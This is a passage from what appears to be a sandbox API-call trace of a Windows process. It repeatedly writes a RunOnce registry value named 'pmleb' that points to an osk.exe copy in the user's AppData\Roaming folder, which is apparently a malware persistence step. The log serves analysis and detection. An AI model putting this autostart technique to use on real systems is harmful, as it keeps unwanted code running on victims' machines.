hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.113] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.114] RegCloseKey (hKey=0x280) returned 0x0 [0109.114] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.114] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.114] SetTimer (hWnd=0x20280, nIDEvent=0x2451, uElapse=0xa, lpTimerFunc=0x0) returned 0x2451 [0109.114] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.128] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.128] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.128] KillTimer (hWnd=0x20280, uIDEvent=0x2451) returned 1 [0109.129] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.129] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.129] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.129] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.129] RegCloseKey (hKey=0x280) returned 0x0 [0109.129] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.130] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.130] SetTimer (hWnd=0x20280, nIDEvent=0x2452, uElapse=0xa, lpTimerFunc=0x0) returned 0x2452 [0109.130] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.148] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.149] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.149] KillTimer (hWnd=0x20280, uIDEvent=0x2452) returned 1 [0109.149] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.149] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.150] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.150] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.150] RegCloseKey (hKey=0x280) returned 0x0 [0109.150] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.150] SetTimer (hWnd=0x20280, nIDEvent=0x2453, uElapse=0xa, lpTimerFunc=0x0) returned 0x2453 [0109.150] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.160] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.160] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.160] KillTimer (hWnd=0x20280, uIDEvent=0x2453) returned 1 [0109.160] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.161] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.161] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.161] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.162] RegCloseKey (hKey=0x280) returned 0x0 [0109.162] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.162] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.162] SetTimer (hWnd=0x20280, nIDEvent=0x2454, uElapse=0xa, lpTimerFunc=0x0) returned 0x2454 [0109.162] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.175] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.175] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.175] KillTimer (hWnd=0x20280, uIDEvent=0x2454) returned 1 [0109.176] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.176] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.176] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.176] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.176] RegCloseKey (hKey=0x280) returned 0x0 [0109.177] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.177] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.177] SetTimer (hWnd=0x20280, nIDEvent=0x2455, uElapse=0xa, lpTimerFunc=0x0) returned 0x2455 [0109.177] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.190] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.190] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.190] KillTimer (hWnd=0x20280, uIDEvent=0x2455) returned 1 [0109.191] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.191] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.191] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.191] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.192] RegCloseKey (hKey=0x280) returned 0x0 [0109.192] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.192] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.192] SetTimer (hWnd=0x20280, nIDEvent=0x2456, uElapse=0xa, lpTimerFunc=0x0) returned 0x2456 [0109.192] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.206] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.206] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.206] KillTimer (hWnd=0x20280, uIDEvent=0x2456) returned 1 [0109.206] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.207] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.207] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.207] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.207] RegCloseKey (hKey=0x280) returned 0x0 [0109.207] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.207] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.207] SetTimer (hWnd=0x20280, nIDEvent=0x2457, uElapse=0xa, lpTimerFunc=0x0) returned 0x2457 [0109.207] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.221] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.222] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.222] KillTimer (hWnd=0x20280, uIDEvent=0x2457) returned 1 [0109.222] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.222] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.222] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.223] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.223] RegCloseKey (hKey=0x280) returned 0x0 [0109.223] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.223] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.223] SetTimer (hWnd=0x20280, nIDEvent=0x2458, uElapse=0xa, lpTimerFunc=0x0) returned 0x2458 [0109.223] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.237] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.237] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.237] KillTimer (hWnd=0x20280, uIDEvent=0x2458) returned 1 [0109.238] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.238] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.238] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.238] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.239] RegCloseKey (hKey=0x280) returned 0x0 [0109.239] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.239] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.239] SetTimer (hWnd=0x20280, nIDEvent=0x2459, uElapse=0xa, lpTimerFunc=0x0) returned 0x2459 [0109.239] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.253] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.253] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.254] KillTimer (hWnd=0x20280, uIDEvent=0x2459) returned 1 [0109.254] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.254] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.255] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.255] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.255] RegCloseKey (hKey=0x280) returned 0x0 [0109.255] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.255] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.255] SetTimer (hWnd=0x20280, nIDEvent=0x245a, uElapse=0xa, lpTimerFunc=0x0) returned 0x245a [0109.255] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.305] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.305] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.305] KillTimer (hWnd=0x20280, uIDEvent=0x245a) returned 1 [0109.305] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.306] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.306] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.306] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.306] RegCloseKey (hKey=0x280) returned 0x0 [0109.306] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.306] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.306] SetTimer (hWnd=0x20280, nIDEvent=0x245b, uElapse=0xa, lpTimerFunc=0x0) returned 0x245b [0109.307] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.316] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.316] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.316] KillTimer (hWnd=0x20280, uIDEvent=0x245b) returned 1 [0109.316] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.317] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.317] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.317] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.317] RegCloseKey (hKey=0x280) returned 0x0 [0109.317] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.317] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.318] SetTimer (hWnd=0x20280, nIDEvent=0x245c, uElapse=0xa, lpTimerFunc=0x0) returned 0x245c [0109.318] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.331] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.331] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.331] KillTimer (hWnd=0x20280, uIDEvent=0x245c) returned 1 [0109.332] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.332] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.332] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.332] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.332] RegCloseKey (hKey=0x280) returned 0x0 [0109.332] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.333] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.333] SetTimer (hWnd=0x20280, nIDEvent=0x245d, uElapse=0xa, lpTimerFunc=0x0) returned 0x245d [0109.333] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.346] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.346] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.347] KillTimer (hWnd=0x20280, uIDEvent=0x245d) returned 1 [0109.347] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.347] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.347] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.347] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.348] RegCloseKey (hKey=0x280) returned 0x0 [0109.348] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.348] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.348] SetTimer (hWnd=0x20280, nIDEvent=0x245e, uElapse=0xa, lpTimerFunc=0x0) returned 0x245e [0109.348] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.362] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.362] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.362] KillTimer (hWnd=0x20280, uIDEvent=0x245e) returned 1 [0109.363] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.363] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.363] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.363] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.363] RegCloseKey (hKey=0x280) returned 0x0 [0109.364] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.364] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.364] SetTimer (hWnd=0x20280, nIDEvent=0x245f, uElapse=0xa, lpTimerFunc=0x0) returned 0x245f [0109.364] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.377] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.377] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.378] KillTimer (hWnd=0x20280, uIDEvent=0x245f) returned 1 [0109.378] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.379] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.379] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.379] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.380] RegCloseKey (hKey=0x280) returned 0x0 [0109.380] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.380] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.380] SetTimer (hWnd=0x20280, nIDEvent=0x2460, uElapse=0xa, lpTimerFunc=0x0) returned 0x2460 [0109.380] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.393] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.393] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.393] KillTimer (hWnd=0x20280, uIDEvent=0x2460) returned 1 [0109.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.394] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.394] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.394] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.394] RegCloseKey (hKey=0x280) returned 0x0 [0109.394] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.394] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.394] SetTimer (hWnd=0x20280, nIDEvent=0x2461, uElapse=0xa, lpTimerFunc=0x0) returned 0x2461 [0109.394] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.415] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.415] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.415] KillTimer (hWnd=0x20280, uIDEvent=0x2461) returned 1 [0109.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.416] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.416] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.416] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.417] RegCloseKey (hKey=0x280) returned 0x0 [0109.417] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.417] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.417] SetTimer (hWnd=0x20280, nIDEvent=0x2462, uElapse=0xa, lpTimerFunc=0x0) returned 0x2462 [0109.417] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.424] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.424] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.424] KillTimer (hWnd=0x20280, uIDEvent=0x2462) returned 1 [0109.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.425] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.425] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.425] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.425] RegCloseKey (hKey=0x280) returned 0x0 [0109.425] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.425] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.425] SetTimer (hWnd=0x20280, 